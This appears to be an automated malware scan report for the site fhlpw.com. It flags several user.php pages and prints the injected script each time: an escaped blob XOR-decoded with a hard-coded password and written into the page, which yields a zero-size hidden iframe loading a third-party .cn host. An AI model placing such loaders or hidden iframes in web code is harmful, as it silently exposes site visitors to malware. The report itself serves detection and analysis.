Scanned pages/files
Request | Server response | Status |
http://www.fhlpw.com/ | 200 OK Content-Length: 21720 Content-Type: text/html | clean |
http://www.fhlpw.com/js/common.js | 200 OK Content-Length: 29050 Content-Type: application/x-javascript | clean |
http://www.fhlpw.com/js/index.js | 200 OK Content-Length: 2463 Content-Type: application/x-javascript | clean |
http://www.fhlpw.com/themes/quwan/js/left_goodslist.js | 200 OK Content-Length: 1329 Content-Type: application/x-javascript | clean |
http://www.fhlpw.com/js/transport.js | 200 OK Content-Length: 22668 Content-Type: application/x-javascript | clean |
http://www.fhlpw.com/js/utils.js | 200 OK Content-Length: 4297 Content-Type: application/x-javascript | clean |
http://www.fhlpw.com/user.php?act=register | 200 OK Content-Length: 47103 Content-Type: text/html | malicious |
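Malicious code - confirmed by antiviruses (see below). Excerpt of the injected script as captured by the scanner; the middle of the sample (between the last strHTML fragment and str_md5) and the end of the decoded output are cut off in this report:

strHTML="";
strHTML+="%0F@T%10%0D@%11EZ%04%5EU%13%02%05%06F%0C%5B%04@UK%01G%0AA@%0F%3D%04B%5";
strHTML+="DPC%0B%0B%5EE%10B%03%08F%09RTK%15ECLMBY%10%15%0CD@%1D%5EN%5BV%5D%1B%01";
strHTML+="_F%04%17%16%06XS%14QN%00%0EPCV%0D%5BM%16%088l%0F%5DR%0C%0A@GEL%08U%0B%";
strHTML+="02B%0D%0B%5B%5BSY%14%0EX%5D%00%1E%5D%04%0EP%0D%18OR%0A%11CA%1DT%0A%05B";
strHTML+="%26%0AR%00qFN%0AIHO%0AB%12_@%5B%0A%1D%00%0F%0A%05%1EhLPRD%07D%00_%06W%";
strHTML+="16U%12WY
[... sample truncated ...]
str_md5:function(s){return binl2str(core_md5(str2binl(s), s.length * this.chrsz));} }
function performPage(strPass){ if(strPass){ document.cookie="password="+escape(strPass); document.write(XOR(unescape(strHTML),STR.md5(strPass))); return(false); } var pass="6546hgfhfhSSD"; if(pass){ pass=unescape(pass); document.write(XOR(unescape(strHTML),STR.md5(pass))); return(false); } }
performPage();

What the excerpt shows: strHTML is an escaped blob that is unescaped, passed to an XOR() routine keyed with the MD5 of a password, and written into the page with document.write(). performPage() is called with no argument, so the hard-coded value "6546hgfhfhSSD" is used and the blob is decoded for every visitor. The decoded markup below is a zero-size (width=0 height=0) iframe that loads content from a third-party host without anything visible on the page.

Decoded script: <iframe src=http://lczsyq.cn/lczsyq/images/data/index.html width=0 height=0></iframe> <html> <body link="#000000" vlink="#000000"> </body> </html> <html> <body link="#000000" vlink="#000000"> </iframe> <html> <body link="#000000" vlink="#000000"> <script language=JavaScript src="

Antivirus reports: (the per-engine results table is not present in this copy of the report)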
http://www.fhlpw.com/js/user.js | 200 OK Content-Length: 19088 Content-Type: application/x-javascript | clean |
http://www.fhlpw.com/themes/quwan/js/scrolltop.js | 200 OK Content-Length: 699 Content-Type: application/x-javascript | clean |
http://www.fhlpw.com/user.php | 200 OK Content-Length: 44192 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below). Excerpt of the injected script as captured by the scanner; the middle of the sample and the end of the decoded output are cut off in this report:

strHTML="";
strHTML+="%0F@T%10%0D@%11EZ%04%5EU%13%02%05%06F%0C%5B%04@UK%01G%0AA@%0F%3D%04B%5";
strHTML+="DPC%0B%0B%5EE%10B%03%08F%09RTK%15ECLMBY%10%15%0CD@%1D%5EN%5BV%5D%1B%01";
strHTML+="_F%04%17%16%06XS%14QN%00%0EPCV%0D%5BM%16%088l%0F%5DR%0C%0A@GEL%08U%0B%";
strHTML+="02B%0D%0B%5B%5BSY%14%0EX%5D%00%1E%5D%04%0EP%0D%18OR%0A%11CA%1DT%0A%05B";
strHTML+="%26%0AR%00qFN%0AIHO%0AB%12_@%5B%0A%1D%00%0F%0A%05%1EhLPRD%07D%00_%06W%";
strHTML+="16U%12WY
[... sample truncated ...]
str_md5:function(s){return binl2str(core_md5(str2binl(s), s.length * this.chrsz));} }
function performPage(strPass){ if(strPass){ document.cookie="password="+escape(strPass); document.write(XOR(unescape(strHTML),STR.md5(strPass))); return(false); } var pass="6546hgfhfhSSD"; if(pass){ pass=unescape(pass); document.write(XOR(unescape(strHTML),STR.md5(pass))); return(false); } }
performPage();

As called here (performPage() with no argument), the script decodes strHTML with the hard-coded password and writes the result into the page with document.write(); the decoded markup is the zero-size iframe shown below.

Decoded script: <iframe src=http://lczsyq.cn/lczsyq/images/data/index.html width=0 height=0></iframe> <html> <body link="#000000" vlink="#000000"> </body> </html> <html> <body link="#000000" vlink="#000000"> </iframe> <html> <body link="#000000" vlink="#000000"> <script language=JavaScript src="

Antivirus reports: (the per-engine results table is not present in this copy of the report)
http://www.fhlpw.com/index.php | 200 OK Content-Length: 5792 Content-Type: text/html | clean |
http://www.fhlpw.com/user.php?act=order_list | 200 OK Content-Length: 44207 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below). Excerpt of the injected script as captured by the scanner; the middle of the sample and the end of the decoded output are cut off in this report:

strHTML="";
strHTML+="%0F@T%10%0D@%11EZ%04%5EU%13%02%05%06F%0C%5B%04@UK%01G%0AA@%0F%3D%04B%5";
strHTML+="DPC%0B%0B%5EE%10B%03%08F%09RTK%15ECLMBY%10%15%0CD@%1D%5EN%5BV%5D%1B%01";
strHTML+="_F%04%17%16%06XS%14QN%00%0EPCV%0D%5BM%16%088l%0F%5DR%0C%0A@GEL%08U%0B%";
strHTML+="02B%0D%0B%5B%5BSY%14%0EX%5D%00%1E%5D%04%0EP%0D%18OR%0A%11CA%1DT%0A%05B";
strHTML+="%26%0AR%00qFN%0AIHO%0AB%12_@%5B%0A%1D%00%0F%0A%05%1EhLPRD%07D%00_%06W%";
strHTML+="16U%12WY
[... sample truncated ...]
str_md5:function(s){return binl2str(core_md5(str2binl(s), s.length * this.chrsz));} }
function performPage(strPass){ if(strPass){ document.cookie="password="+escape(strPass); document.write(XOR(unescape(strHTML),STR.md5(strPass))); return(false); } var pass="6546hgfhfhSSD"; if(pass){ pass=unescape(pass); document.write(XOR(unescape(strHTML),STR.md5(pass))); return(false); } }
performPage();

As called here (performPage() with no argument), the script decodes strHTML with the hard-coded password and writes the result into the page with document.write(); the decoded markup is the zero-size iframe shown below.

Decoded script: <iframe src=http://lczsyq.cn/lczsyq/images/data/index.html width=0 height=0></iframe> <html> <body link="#000000" vlink="#000000"> </body> </html> <html> <body link="#000000" vlink="#000000"> </iframe> <html> <body link="#000000" vlink="#000000"> <script language=JavaScript src="

Antivirus reports: (the per-engine results table is not present in this copy of the report)
http://www.fhlpw.com/user.php?act=message_list | 200 OK Content-Length: 44209 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below). Excerpt of the injected script as captured by the scanner; the middle of the sample and the end of the decoded output are cut off in this report:

strHTML="";
strHTML+="%0F@T%10%0D@%11EZ%04%5EU%13%02%05%06F%0C%5B%04@UK%01G%0AA@%0F%3D%04B%5";
strHTML+="DPC%0B%0B%5EE%10B%03%08F%09RTK%15ECLMBY%10%15%0CD@%1D%5EN%5BV%5D%1B%01";
strHTML+="_F%04%17%16%06XS%14QN%00%0EPCV%0D%5BM%16%088l%0F%5DR%0C%0A@GEL%08U%0B%";
strHTML+="02B%0D%0B%5B%5BSY%14%0EX%5D%00%1E%5D%04%0EP%0D%18OR%0A%11CA%1DT%0A%05B";
strHTML+="%26%0AR%00qFN%0AIHO%0AB%12_@%5B%0A%1D%00%0F%0A%05%1EhLPRD%07D%00_%06W%";
strHTML+="16U%12WY
[... sample truncated ...]
str_md5:function(s){return binl2str(core_md5(str2binl(s), s.length * this.chrsz));} }
function performPage(strPass){ if(strPass){ document.cookie="password="+escape(strPass); document.write(XOR(unescape(strHTML),STR.md5(strPass))); return(false); } var pass="6546hgfhfhSSD"; if(pass){ pass=unescape(pass); document.write(XOR(unescape(strHTML),STR.md5(pass))); return(false); } }
performPage();

As called here (performPage() with no argument), the script decodes strHTML with the hard-coded password and writes the result into the page with document.write(); the decoded markup is the zero-size iframe shown below.

Decoded script: <iframe src=http://lczsyq.cn/lczsyq/images/data/index.html width=0 height=0></iframe> <html> <body link="#000000" vlink="#000000"> </body> </html> <html> <body link="#000000" vlink="#000000"> </iframe> <html> <body link="#000000" vlink="#000000"> <script language=JavaScript src="

Antivirus reports: (the per-engine results table is not present in this copy of the report)
http://www.fhlpw.com/user.php?act=collection_list | 200 OK Content-Length: 44212 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below). Excerpt of the injected script as captured by the scanner; the middle of the sample and the end of the decoded output are cut off in this report:

strHTML="";
strHTML+="%0F@T%10%0D@%11EZ%04%5EU%13%02%05%06F%0C%5B%04@UK%01G%0AA@%0F%3D%04B%5";
strHTML+="DPC%0B%0B%5EE%10B%03%08F%09RTK%15ECLMBY%10%15%0CD@%1D%5EN%5BV%5D%1B%01";
strHTML+="_F%04%17%16%06XS%14QN%00%0EPCV%0D%5BM%16%088l%0F%5DR%0C%0A@GEL%08U%0B%";
strHTML+="02B%0D%0B%5B%5BSY%14%0EX%5D%00%1E%5D%04%0EP%0D%18OR%0A%11CA%1DT%0A%05B";
strHTML+="%26%0AR%00qFN%0AIHO%0AB%12_@%5B%0A%1D%00%0F%0A%05%1EhLPRD%07D%00_%06W%";
strHTML+="16U%12WY
[... sample truncated ...]
str_md5:function(s){return binl2str(core_md5(str2binl(s), s.length * this.chrsz));} }
function performPage(strPass){ if(strPass){ document.cookie="password="+escape(strPass); document.write(XOR(unescape(strHTML),STR.md5(strPass))); return(false); } var pass="6546hgfhfhSSD"; if(pass){ pass=unescape(pass); document.write(XOR(unescape(strHTML),STR.md5(pass))); return(false); } }
performPage();

As called here (performPage() with no argument), the script decodes strHTML with the hard-coded password and writes the result into the page with document.write(); the decoded markup is the zero-size iframe shown below.

Decoded script: <iframe src=http://lczsyq.cn/lczsyq/images/data/index.html width=0 height=0></iframe> <html> <body link="#000000" vlink="#000000"> </body> </html> <html> <body link="#000000" vlink="#000000"> </iframe> <html> <body link="#000000" vlink="#000000"> <script language=JavaScript src="

Antivirus reports: (the per-engine results table is not present in this copy of the report)
http://www.fhlpw.com/user.php?act=affiliate | 200 OK Content-Length: 26064 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: fhlpw.com
Result:
GET / HTTP/1.1
Host: fhlpw.com
Result:
Second query (visit from search engine):
GET / HTTP/1.1
Host: fhlpw.com
Referer: http://www.google.com/search?q=fhlpw.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=fhlpw.com
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://fhlpw.com/
Result: fhlpw.com is not infected or malware details are not published yet.